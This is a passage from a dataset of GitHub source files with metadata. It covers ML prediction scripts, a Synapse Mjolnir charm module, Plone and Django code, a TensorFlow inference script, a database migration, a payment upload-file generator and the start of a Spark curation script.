{"api_name": "PIL.Image.ANTIALIAS", "line_number": 61, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 61, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 67, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 67, "usage_type": "name"}, {"api_name": "PIL.ImageOps.expand", "line_number": 75, "usage_type": "call"}, {"api_name": "PIL.ImageOps", "line_number": 75, "usage_type": "name"}, {"api_name": "PIL.Image.LANCZOS", "line_number": 88, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 88, "usage_type": "name"}, {"api_name": "multiprocessing.Pool", "line_number": 98, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 99, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 101, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 101, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 102, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 105, "usage_type": "call"}]} +{"seq_id": "31627190353", "text": "# Built-in imports\nimport os\nimport sys\nimport argparse\nfrom datetime import datetime\n\n# External imports\nimport pickle\nimport pandas as pd\n\n# Own imports\nimport get_path_dir as gpd\n\n# Define some important directories\nMODEL_DIR = os.path.join(\n gpd.get_desired_folder_path(\"01_introduction\"), \n \"models\"\n)\nDATA_DIR = gpd.get_desired_folder_path(\"data\")\n\nwith open(os.path.join(MODEL_DIR,'lin_reg.bin'), 'rb') as f_in:\n dv, lr = pickle.load(f_in)\n\nCATEGORICAL = ['PUlocationID', 'DOlocationID']\n\ndef read_data(filename:str) -> pd.DataFrame:\n df = pd.read_parquet(filename)\n \n df['duration'] = df[\"dropOff_datetime\"] - df[\"pickup_datetime\"]\n df['duration'] = df[\"duration\"].dt.total_seconds() / 60\n\n df = df[(df[\"duration\"] >= 1) & (df[\"duration\"] <= 60)]\n\n df[CATEGORICAL] = df[CATEGORICAL].fillna(-1).astype('float').astype('str')\n \n return df\n\ndef predict(df: pd.DataFrame) -> pd.DataFrame:\n dicts = df[CATEGORICAL].to_dict(orient='records')\n X_val = dv.transform(dicts)\n y_pred = lr.predict(X_val)\n\n df_resulted = pd.DataFrame()\n df_resulted['ride_id'] = f'{datetime.today().year:04d}/{datetime.today().month:02d}_' + 
df.index.astype('str')\n df_resulted[\"predictions\"] = y_pred\n\n return df_resulted\n\ndef save_predictions(df:pd.DataFrame, year:int, month:int) -> None:\n df.to_parquet(\n os.path.join(\n DATA_DIR,\n \"predictions\",\n f\"{datetime.today()}-fhv_tripdata_{year}-{int(month):02d}.parquet\"\n ),\n engine='pyarrow',\n compression=None,\n index=False\n )\n\ndef main():\n arg_fmt = argparse.RawDescriptionHelpFormatter\n parser = argparse.ArgumentParser(formatter_class=arg_fmt,\n description=main.__doc__\n )\n required = parser.add_argument_group('required arguments')\n required.add_argument(\n '-y', '--year', dest='year', required=True,\n help='The year associated to the dataset that is going to be used to make the predictions'\n )\n required.add_argument(\n '-m', '--month', dest='month', required=True, choices=[str(x) for x in range(1,13)],\n help='The month associated to the dataset that is going to be used to make the predictions'\n )\n\n args = parser.parse_args()\n\n print(\"Making the predictions ... \")\n \n try:\n df = read_data(os.path.join(DATA_DIR, f\"fhv_tripdata_{args.year}-{int(args.month):02d}.parquet\"))\n predictions = predict(df)\n save_predictions(predictions, args.year, args.month)\n print(f\"The mean predicted duration is {predictions['predictions'].mean()}\")\n except Exception as e:\n print(e)\n\n\nif __name__ == '__main__':\n sys.exit(main())\n", "repo_name": "Elkinmt19/ml-engineering-dojo", "sub_path": "mlops/mlops-zoomcamp/04_deployment/scripts/ride-duration.py.py", "file_name": "ride-duration.py.py", "file_ext": "py", "file_size_in_byte": 2689, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "86", "api": [{"api_name": "os.path.join", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "get_path_dir.get_desired_folder_path", "line_number": 16, "usage_type": "call"}, {"api_name": "get_path_dir.get_desired_folder_path", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "pickle.load", "line_number": 22, "usage_type": "call"}, {"api_name": "pandas.read_parquet", "line_number": 27, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 26, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 38, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 43, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 44, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 44, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 49, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path", "line_number": 51, "usage_type": "attribute"}, {"api_name": "datetime.datetime.today", "line_number": 54, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 54, "usage_type": "name"}, {"api_name": "argparse.RawDescriptionHelpFormatter", "line_number": 62, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 63, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 81, "usage_type": "call"}, {"api_name": "os.path", "line_number": 81, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 90, "usage_type": "call"}]} +{"seq_id": "6586311337", "text": "import 
logging\nimport typing\n\nimport ops\n\nimport actions\nimport synapse\nfrom charm_state import CharmState\n\nlogger = logging.getLogger(__name__)\n\nMJOLNIR_SERVICE_NAME = \"mjolnir\"\nUSERNAME = \"moderator\"\n\n\nclass Mjolnir(ops.Object): # pylint: disable=too-few-public-methods\n \"\"\"A class representing the Mjolnir plugin for Synapse application.\n\n Mjolnir is a moderation tool for Matrix to be used to protect your server from malicious\n invites, spam messages etc.\n See https://github.com/matrix-org/mjolnir/ for more details about it.\n \"\"\"\n\n def __init__(self, charm: ops.CharmBase, charm_state: CharmState):\n \"\"\"Initialize a new instance of the Mjolnir class.\n\n Args:\n charm: The charm object that the Mjolnir instance belongs to.\n charm_state: Instance of CharmState.\n \"\"\"\n super().__init__(charm, \"mjolnir\")\n self._charm = charm\n self._charm_state = charm_state\n self.framework.observe(charm.on.collect_unit_status, self._on_collect_status)\n\n @property\n def _pebble_service(self) -> typing.Any:\n \"\"\"Return instance of pebble service.\n\n Returns:\n instance of pebble service or none.\n \"\"\"\n return getattr(self._charm, \"pebble_service\", None)\n\n @property\n def _admin_access_token(self) -> typing.Optional[str]:\n \"\"\"Get admin access token.\n\n Returns:\n admin access token or None if fails.\n \"\"\"\n get_admin_access_token = getattr(self._charm, \"get_admin_access_token\", None)\n if not get_admin_access_token:\n logging.error(\"Failed to get method get_admin_access_token.\")\n return None\n return get_admin_access_token()\n\n def _on_collect_status(self, event: ops.CollectStatusEvent) -> None:\n \"\"\"Collect status event handler.\n\n Args:\n event: Collect status event.\n \"\"\"\n if not self._charm_state.synapse_config.enable_mjolnir:\n return\n container = self._charm.unit.get_container(synapse.SYNAPSE_CONTAINER_NAME)\n if not container.can_connect():\n self._charm.unit.status = ops.MaintenanceStatus(\"Waiting for pebble\")\n return\n mjolnir_service = container.get_services(MJOLNIR_SERVICE_NAME)\n if mjolnir_service:\n logger.debug(\"%s service already exists, skipping\", MJOLNIR_SERVICE_NAME)\n return\n synapse_service = container.get_services(synapse.SYNAPSE_SERVICE_NAME)\n synapse_not_active = [\n service for service in synapse_service.values() if not service.is_running()\n ]\n if not synapse_service or synapse_not_active:\n # The get_membership_room_id does a call to Synapse API in order to get the\n # membership room id. This only works if Synapse is running so that's why\n # the service status is checked here.\n self._charm.unit.status = ops.MaintenanceStatus(\"Waiting for Synapse\")\n return\n if not self._admin_access_token:\n self._charm.unit.status = ops.MaintenanceStatus(\n \"Failed to get admin access token. Please, check the logs.\"\n )\n return\n try:\n if self.get_membership_room_id(self._admin_access_token) is None:\n status = ops.BlockedStatus(\n f\"{synapse.MJOLNIR_MEMBERSHIP_ROOM} not found and \"\n \"is required by Mjolnir. Please, check the logs.\"\n )\n interval = self._charm.model.config.get(\"update-status-hook-interval\", \"\")\n logger.error(\n \"The Mjolnir configuration will be done in %s after the room %s is created.\"\n \"This interval is set in update-status-hook-interval model config.\",\n interval,\n synapse.MJOLNIR_MEMBERSHIP_ROOM,\n )\n event.add_status(status)\n return\n except synapse.APIError as exc:\n logger.exception(\n \"Failed to check for membership_room. 
Mjolnir will not be configured: %r\",\n exc,\n )\n return\n self.enable_mjolnir(self._admin_access_token)\n event.add_status(ops.ActiveStatus())\n\n def get_membership_room_id(self, admin_access_token: str) -> typing.Optional[str]:\n \"\"\"Check if membership room exists.\n\n Args:\n admin_access_token: not empty admin access token.\n\n Returns:\n The room id or None if is not found.\n \"\"\"\n return synapse.get_room_id(\n room_name=synapse.MJOLNIR_MEMBERSHIP_ROOM, admin_access_token=admin_access_token\n )\n\n def enable_mjolnir(self, admin_access_token: str) -> None:\n \"\"\"Enable mjolnir service.\n\n The required steps to enable Mjolnir are:\n - Get an admin access token.\n - Check if the MJOLNIR_MEMBERSHIP_ROOM room is created.\n -- Only users from there will be allowed to join the management room.\n - Create Mjolnir user or get its access token if already exists.\n - Create the management room or get its room id if already exists.\n -- The management room will allow only members of MJOLNIR_MEMBERSHIP_ROOM room to join it.\n - Make the Mjolnir user admin of this room.\n - Create the Mjolnir configuration file.\n - Override Mjolnir user rate limit.\n - Finally, add Mjolnir pebble layer.\n\n Args:\n admin_access_token: not empty admin access token.\n \"\"\"\n container = self._charm.unit.get_container(synapse.SYNAPSE_CONTAINER_NAME)\n if not container.can_connect():\n self._charm.unit.status = ops.MaintenanceStatus(\"Waiting for pebble\")\n return\n self._charm.model.unit.status = ops.MaintenanceStatus(\"Configuring Mjolnir\")\n mjolnir_user = actions.register_user(\n container,\n USERNAME,\n True,\n admin_access_token,\n str(self._charm_state.synapse_config.server_name),\n )\n mjolnir_access_token = mjolnir_user.access_token\n room_id = synapse.get_room_id(\n room_name=synapse.MJOLNIR_MANAGEMENT_ROOM, admin_access_token=admin_access_token\n )\n if room_id is None:\n logger.info(\"Room %s not found, creating\", synapse.MJOLNIR_MANAGEMENT_ROOM)\n room_id = synapse.create_management_room(admin_access_token=admin_access_token)\n # Add the Mjolnir user to the management room\n synapse.make_room_admin(\n user=mjolnir_user,\n server=str(self._charm_state.synapse_config.server_name),\n admin_access_token=admin_access_token,\n room_id=room_id,\n )\n synapse.create_mjolnir_config(\n container=container, access_token=mjolnir_access_token, room_id=room_id\n )\n synapse.override_rate_limit(\n user=mjolnir_user,\n admin_access_token=admin_access_token,\n charm_state=self._charm_state,\n )\n self._pebble_service.replan_mjolnir(container)\n self._charm.model.unit.status = ops.ActiveStatus()\n", "repo_name": "canonical/synapse-operator", "sub_path": "src/mjolnir.py", "file_name": "mjolnir.py", "file_ext": "py", "file_size_in_byte": 7219, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "86", "api": [{"api_name": "logging.getLogger", "line_number": 10, "usage_type": "call"}, {"api_name": "ops.Object", "line_number": 16, "usage_type": "attribute"}, {"api_name": "ops.CharmBase", "line_number": 24, "usage_type": "attribute"}, {"api_name": "charm_state.CharmState", "line_number": 24, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 37, "usage_type": "attribute"}, {"api_name": "logging.error", "line_number": 54, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 46, "usage_type": "attribute"}, {"api_name": "ops.CollectStatusEvent", "line_number": 58, "usage_type": "attribute"}, {"api_name": 
"synapse.SYNAPSE_CONTAINER_NAME", "line_number": 66, "usage_type": "attribute"}, {"api_name": "ops.MaintenanceStatus", "line_number": 68, "usage_type": "call"}, {"api_name": "synapse.SYNAPSE_SERVICE_NAME", "line_number": 74, "usage_type": "attribute"}, {"api_name": "ops.MaintenanceStatus", "line_number": 82, "usage_type": "call"}, {"api_name": "ops.MaintenanceStatus", "line_number": 85, "usage_type": "call"}, {"api_name": "ops.BlockedStatus", "line_number": 91, "usage_type": "call"}, {"api_name": "synapse.MJOLNIR_MEMBERSHIP_ROOM", "line_number": 92, "usage_type": "attribute"}, {"api_name": "synapse.MJOLNIR_MEMBERSHIP_ROOM", "line_number": 100, "usage_type": "attribute"}, {"api_name": "synapse.APIError", "line_number": 104, "usage_type": "attribute"}, {"api_name": "ops.ActiveStatus", "line_number": 111, "usage_type": "call"}, {"api_name": "synapse.get_room_id", "line_number": 122, "usage_type": "call"}, {"api_name": "synapse.MJOLNIR_MEMBERSHIP_ROOM", "line_number": 123, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 113, "usage_type": "attribute"}, {"api_name": "synapse.SYNAPSE_CONTAINER_NAME", "line_number": 144, "usage_type": "attribute"}, {"api_name": "ops.MaintenanceStatus", "line_number": 146, "usage_type": "call"}, {"api_name": "ops.MaintenanceStatus", "line_number": 148, "usage_type": "call"}, {"api_name": "actions.register_user", "line_number": 149, "usage_type": "call"}, {"api_name": "synapse.get_room_id", "line_number": 157, "usage_type": "call"}, {"api_name": "synapse.MJOLNIR_MANAGEMENT_ROOM", "line_number": 158, "usage_type": "attribute"}, {"api_name": "synapse.MJOLNIR_MANAGEMENT_ROOM", "line_number": 161, "usage_type": "attribute"}, {"api_name": "synapse.create_management_room", "line_number": 162, "usage_type": "call"}, {"api_name": "synapse.make_room_admin", "line_number": 164, "usage_type": "call"}, {"api_name": "synapse.create_mjolnir_config", "line_number": 170, "usage_type": "call"}, {"api_name": "synapse.override_rate_limit", "line_number": 173, "usage_type": "call"}, {"api_name": "ops.ActiveStatus", "line_number": 179, "usage_type": "call"}]} +{"seq_id": "12692049126", "text": "# -*- coding: utf-8 -*-\n\nfrom DateTime import DateTime\nfrom DateTime.interfaces import DateTimeError\nfrom Products.CMFPlone import utils\nfrom collective.tablepage.fields.base import BaseField\nfrom collective.tablepage.fields.base import BaseFieldDataRetriever\nfrom collective.tablepage.fields.interfaces import IDateTimeColumnField\nfrom zope.component import getMultiAdapter\nfrom zope.interface import implements\n\ntry:\n from zope.browserpage.viewpagetemplatefile import ViewPageTemplateFile\nexcept ImportError:\n # Plone < 4.1\n from zope.app.pagetemplate.viewpagetemplatefile import ViewPageTemplateFile\n\n\nclass DateTimeField(BaseField):\n \"\"\"A field that store date-time formatted string\"\"\"\n implements(IDateTimeColumnField)\n\n edit_template = ViewPageTemplateFile('templates/datetime.pt')\n view_template = ViewPageTemplateFile('templates/string_view.pt')\n\n show_hm = True\n\n @classmethod\n def RealIndexIterator(csl):\n # Plone 3 compatibility\n return utils.RealIndexIterator(pos=0)\n\n def render_view(self, data, index=None, storage=None):\n self.data = data or ''\n if self.data:\n try:\n date = DateTime(self.data)\n ploneview = getMultiAdapter((self.context, self.request), name=u'plone')\n self.data = ploneview.toLocalizedTime(date, long_format=self.show_hm)\n except DateTimeError:\n self.data = ''\n return 
self.view_template(data=self.data)\n\n\nclass DateField(DateTimeField):\n    \"\"\"A field that stores a date formatted string\"\"\"\n    show_hm = False\n\n\nclass DateTimeDataRetriever(BaseFieldDataRetriever):\n    \"\"\"Get data from the request, return it as a date\"\"\"\n\n    show_hm = True\n\n    def __init__(self, context):\n        self.context = context\n        self.configuration = None\n\n    def get_from_request(self, name, request):\n        \"\"\"Return data only if it is a real date formatted string\"\"\"\n        \n        datestr = \"%(year)s/%(month)s/%(day)s\" % {'year': request.get(\"%s_year\" % name),\n                                                  'month': request.get(\"%s_month\" % name),\n                                                  'day': request.get(\"%s_day\" % name),\n                                                  }\n        if self.show_hm:\n            timestr = \" %(hour)s:%(minute)s:00\" % {'hour': request.get(\"%s_hour\" % name),\n                                                   'minute': request.get(\"%s_minute\" % name),\n                                                   }\n        else:\n            timestr = ' 00:00:00'\n        datestr += timestr\n\n        try:\n            return {name: DateTime(datestr).strftime('%Y/%m/%d %H:%M:%S')}\n        except DateTimeError:\n            pass\n        return {name: None}\n\n    def data_for_display(self, data, backend=False, row_index=None):\n        \"\"\"Return the data formatted in the proper locale format\"\"\"\n        if backend:\n            return data \n        ploneview = getMultiAdapter((self.context, self.context.REQUEST), name=u'plone')\n        return ploneview.toLocalizedTime(data, long_format=self.show_hm)\n\n    def data_to_storage(self, data):\n        \"\"\"Try to convert data to a DateTime\"\"\"\n        data = data and data.strip() or ''\n        try:\n            DateTime(data)\n        except DateTimeError:\n            return None\n        return data\n\n\nclass DateDataRetriever(DateTimeDataRetriever):\n    show_hm = False\n", "repo_name": "collective/collective.tablepage", "sub_path": "collective/tablepage/fields/date_time.py", "file_name": "date_time.py", "file_ext": "py", "file_size_in_byte": 3425, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "86", "api": [{"api_name": "collective.tablepage.fields.base.BaseField", "line_number": 19, "usage_type": "name"}, {"api_name": "zope.interface.implements", "line_number": 21, "usage_type": "call"}, {"api_name": "collective.tablepage.fields.interfaces.IDateTimeColumnField", "line_number": 21, "usage_type": "argument"}, {"api_name": "zope.app.pagetemplate.viewpagetemplatefile.ViewPageTemplateFile", "line_number": 23, "usage_type": "call"}, {"api_name": "zope.app.pagetemplate.viewpagetemplatefile.ViewPageTemplateFile", "line_number": 24, "usage_type": "call"}, {"api_name": "Products.CMFPlone.utils.RealIndexIterator", "line_number": 31, "usage_type": "call"}, {"api_name": "Products.CMFPlone.utils", "line_number": 31, "usage_type": "name"}, {"api_name": "DateTime.DateTime", "line_number": 37, "usage_type": "call"}, {"api_name": "zope.component.getMultiAdapter", "line_number": 38, "usage_type": "call"}, {"api_name": "DateTime.interfaces.DateTimeError", "line_number": 40, "usage_type": "name"}, {"api_name": "collective.tablepage.fields.base.BaseFieldDataRetriever", "line_number": 50, "usage_type": "name"}, {"api_name": "DateTime.DateTime", "line_number": 75, "usage_type": "call"}, {"api_name": "DateTime.interfaces.DateTimeError", "line_number": 76, "usage_type": "name"}, {"api_name": "zope.component.getMultiAdapter", "line_number": 84, "usage_type": "call"}, {"api_name": "DateTime.DateTime", "line_number": 91, "usage_type": "call"}, {"api_name": "DateTime.interfaces.DateTimeError", "line_number": 92, "usage_type": "name"}]} +{"seq_id": "29151949248", "text": "# urls.py\n\nfrom django.urls import path\nfrom backend_api.views import UserRegistrationView, 
UserLoginView, UserProfileView,SortedInputView,AllInputView\n\nurlpatterns = [\n path('register/', UserRegistrationView.as_view(), name='user-registration'),\n path('login/', UserLoginView.as_view(), name='user-login'),\n path('profile/', UserProfileView.as_view()),\n path('searchinput/', SortedInputView.as_view()),\n path('allinput/', AllInputView.as_view()),\n\n]\n", "repo_name": "nusratdevo/evident_search_app", "sub_path": "backend/backend_api/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 466, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "backend_api.views.UserRegistrationView.as_view", "line_number": 7, "usage_type": "call"}, {"api_name": "backend_api.views.UserRegistrationView", "line_number": 7, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "backend_api.views.UserLoginView.as_view", "line_number": 8, "usage_type": "call"}, {"api_name": "backend_api.views.UserLoginView", "line_number": 8, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "backend_api.views.UserProfileView.as_view", "line_number": 9, "usage_type": "call"}, {"api_name": "backend_api.views.UserProfileView", "line_number": 9, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "backend_api.views.SortedInputView.as_view", "line_number": 10, "usage_type": "call"}, {"api_name": "backend_api.views.SortedInputView", "line_number": 10, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "backend_api.views.AllInputView.as_view", "line_number": 11, "usage_type": "call"}, {"api_name": "backend_api.views.AllInputView", "line_number": 11, "usage_type": "name"}]} +{"seq_id": "24285623584", "text": "import tensorflow as tf\nimport cv2\nimport numpy as np\n\n\ngraph_def = 'weights/yolov3.pb'\n\nwith tf.gfile.GFile(graph_def, \"rb\") as f:\n restored_graph_def = tf.GraphDef()\n restored_graph_def.ParseFromString(f.read())\n\n# for node in restored_graph_def.node:\n# if 'transpose' in node.name.lower():\n# print(node.name, node.op)\ntf.import_graph_def(\n restored_graph_def,\n input_map=None,\n return_elements=None,\n name=\"\")\n\nimg = cv2.imread('data/samples/bus.jpg')\nimg = cv2.resize(img, (416, 416))\nimg = img[None, :, :, :]\nimg = np.transpose(img, [0, 3, 1, 2])\n\nwith tf.Session() as sess:\n pred = sess.run(\"concat_84:0\", feed_dict={'input.1:0':img})\n\nprint(pred)\n\n# writer = tf.summary.FileWriter(\"./graph\", graph) \n# writer.close()\n\n\n", "repo_name": "zldrobit/onnx_tflite_yolov3", "sub_path": "tf_infer.py", "file_name": "tf_infer.py", "file_ext": "py", "file_size_in_byte": 763, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 69, "dataset": "github-code", "pt": "86", "api": [{"api_name": "tensorflow.gfile.GFile", "line_number": 8, "usage_type": "call"}, {"api_name": "tensorflow.gfile", "line_number": 8, "usage_type": "attribute"}, {"api_name": "tensorflow.GraphDef", "line_number": 9, "usage_type": "call"}, {"api_name": "tensorflow.import_graph_def", "line_number": 15, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 21, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 24, 
"usage_type": "call"}, {"api_name": "tensorflow.Session", "line_number": 26, "usage_type": "call"}]} +{"seq_id": "6679796848", "text": "# -*- coding: utf-8 -*-\n__author__ = 'Administrator'\nfrom ..models import User,Activity,Balance_Flow,User_User_Balance\nfrom datetime import datetime as DateTime\ndef user_join_activity(user=User,activity=Activity):\n now=DateTime.now()\n #过了某个时间就不能报��\n if now>activity.participate_deadline:\n return (False,'too late')\n current_participants=len(activity.participants)\n if current_participants==activity.max_participant:\n return (False,'no rooms')\n min_pay=activity.total_cost_expected/ ( activity.min_participant if current_participants<=activity.min_participant else current_participants)\n if user.user_acount.balance=0.7.1',\n ],\n download_url=DOWNLOAD_URL,\n description=DESCRIPTION,\n long_description=LONG_DESCRIPTION,\n license=LICENSE,\n classifiers=[\n 'Intended Audience :: Science/Research',\n 'Programming Language :: Python',\n 'Topic :: Mathematics',\n 'Operating System :: Unix',\n 'Operating System :: MacOS'\n ],\n)\n", "repo_name": "Jim-Holmstroem/AKS-Test", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 1033, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "86", "api": [{"api_name": "setuptools.setup", "line_number": 17, "usage_type": "call"}, {"api_name": "setuptools.find_packages", "line_number": 19, "usage_type": "call"}]} +{"seq_id": "72598167643", "text": "\"\"\"empty message\n\nRevision ID: c3a4b4794f06\nRevises: \nCreate Date: 2023-04-06 03:19:46.147777\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\n# revision identifiers, used by Alembic.\nrevision = 'c3a4b4794f06'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('products', sa.Column('product_name', sa.String(length=200), nullable=True))\n op.drop_column('products', 'productname')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n    op.add_column('products', sa.Column('productname', mysql.VARCHAR(length=200), nullable=True))\n    op.drop_column('products', 'product_name')\n    # ### end Alembic commands ###\n", "repo_name": "yqliu776/systerm-dsmanager", "sub_path": "migrations/versions/c3a4b4794f06_.py", "file_name": "c3a4b4794f06_.py", "file_ext": "py", "file_size_in_byte": 836, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "86", "api": [{"api_name": "alembic.op.add_column", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 21, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 21, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op.drop_column", "line_number": 22, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 22, "usage_type": "name"}, {"api_name": "alembic.op.add_column", "line_number": 28, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 28, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 28, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.mysql.VARCHAR", "line_number": 28, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.mysql", "line_number": 28, "usage_type": "name"}, {"api_name": "alembic.op.drop_column", "line_number": 29, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 29, "usage_type": "name"}]} +{"seq_id": "30243680368", "text": "from django.conf import settings\n\nfrom webapp.apps.external_api import constants\nfrom webapp.apps import code_generator\nfrom core import models as core_models\nfrom collections import OrderedDict\n\nimport logging\nfrom datetime import date\nimport os\n\nlogger = logging.getLogger(\"default\")\n\nclass BillDeskPayment(object):\n    \n    def createOutputFile(self, name):\n        base_dir = os.path.dirname(os.path.dirname(__file__)).replace('/webapp/apps/external_api', '')\n        output_path = base_dir + '/webapp/static/'\n        outfile = open(output_path + name, \"w\")\n        return outfile, output_path + name\n\n    def generateBSEUploadFile(self, txns):\n        from payment import models as payment_models\n\n        dt_today_str = date.today().strftime(\"%d%m%Y\")\n        out_filename = 'FW_FUN_' + dt_today_str + '.txt'\n        out_file, out_filepath = self.createOutputFile(out_filename)\n        \n        missing_order_ids = []\n        for pay in txns:\n            if pay.txn_status == payment_models.Transaction.Status.Success:\n                order_details = core_models.OrderDetail.objects.filter(transaction=pay)\n                \n                for order in order_details:\n                    for fund_order_item in order.fund_order_items.all():\n                        if int(fund_order_item.order_amount) > 0:\n                            if not fund_order_item.bse_transaction_id:\n                                missing_order_ids.append(fund_order_item)\n                            else:\n                                bse_order_dict = OrderedDict([('ORDER DATE', fund_order_item.modified_at.strftime('%d/%m/%Y')), \n                                                              ('Order ID', str(fund_order_item.bse_transaction_id)),\n                                                              ('Client Code', str(pay.user.finaskus_id)),\n                                                              ('Order Val AMOUNT', str(fund_order_item.order_amount))])\n                                out_file.write(\"|\".join(bse_order_dict.values()))\n                                out_file.write(\"\\r\")\n                                bse_order_dict.clear()\n        \n        out_file.close()\n        if len(missing_order_ids) > 0:\n            return missing_order_ids, \"MISSING_BSE_ORDER_ID\"\n        \n        return \"webapp/static/\" + os.path.basename(out_filepath), None\n    \n    def generateBSEUploadFileForDate(self, paydate):\n        from payment import models as payment_models\n        \n        self.pay_date = paydate\n        payments = payment_models.Transaction.objects.filter(txn_time__month=self.pay_date.month, 
txn_time__day=self.pay_date.day,\r\n                    txn_time__year = self.pay_date.year, txn_status=payment_models.Transaction.Status.Success)\n        \n        return self.generateBSEUploadFile(payments)\n\n\n# transaction = Payment(constants.GET_PASSWORD_URL)\n# passkey = code_generator(8)\n# transaction.get_encrypted_password(settings.BSE_DEMO_USERID, settings.BSE_DEMO_MEMBERID, settings.BSE_DEMO_PASSWORD, passkey)\n", "repo_name": "webclinic017/backend", "sub_path": "webapp/apps/external_api/bse/billdesk_payment.py", "file_name": "billdesk_payment.py", "file_ext": "py", "file_size_in_byte": 3054, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "logging.getLogger", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "datetime.date.today", "line_number": 25, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 25, "usage_type": "name"}, {"api_name": "payment.models.Transaction", "line_number": 31, "usage_type": "attribute"}, {"api_name": "payment.models", "line_number": 31, "usage_type": "name"}, {"api_name": "core.models.OrderDetail.objects.filter", "line_number": 32, "usage_type": "call"}, {"api_name": "core.models.OrderDetail", "line_number": 32, "usage_type": "attribute"}, {"api_name": "core.models", "line_number": 32, "usage_type": "name"}, {"api_name": "collections.OrderedDict", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path", "line_number": 52, "usage_type": "attribute"}, {"api_name": "payment.models.Transaction.objects.filter", "line_number": 58, "usage_type": "call"}, {"api_name": "payment.models.Transaction", "line_number": 58, "usage_type": "attribute"}, {"api_name": "payment.models", "line_number": 58, "usage_type": "name"}, {"api_name": "payment.models.Transaction", "line_number": 59, "usage_type": "attribute"}, {"api_name": "payment.models", "line_number": 59, "usage_type": "name"}]} +{"seq_id": "36019250245", "text": "#MAIN_DATA_CURATION--------run it with spark-submit \nimport time\nfrom elasticsearch import Elasticsearch\nfrom pyspark.sql import SQLContext, SparkSession\nfrom pyspark.sql.functions import col\nfrom spark_functions import elastic2df, df2elastic\nimport spark_functions as sf\nstart_time = time.time()\n\n#spark connection\nsc = SparkSession.builder.appName(\"sensors processing\").getOrCreate()\nsqlContext = SQLContext(sc)\nes = Elasticsearch([{'host': 'localhost', 'port': 9200}])\n\n#---------------------ELASTIC 2 SPARK-----------------------------#\n\n#elasticsearch variables\nindex = \"clean_sensors\"\nindex_output = \"curated_sensors\"\ndoc_type = \"IoT\" \n\n#spark processing: delete strange float values on results (86 records)\ndf = elastic2df(es,index,doc_type)\ndf_float = 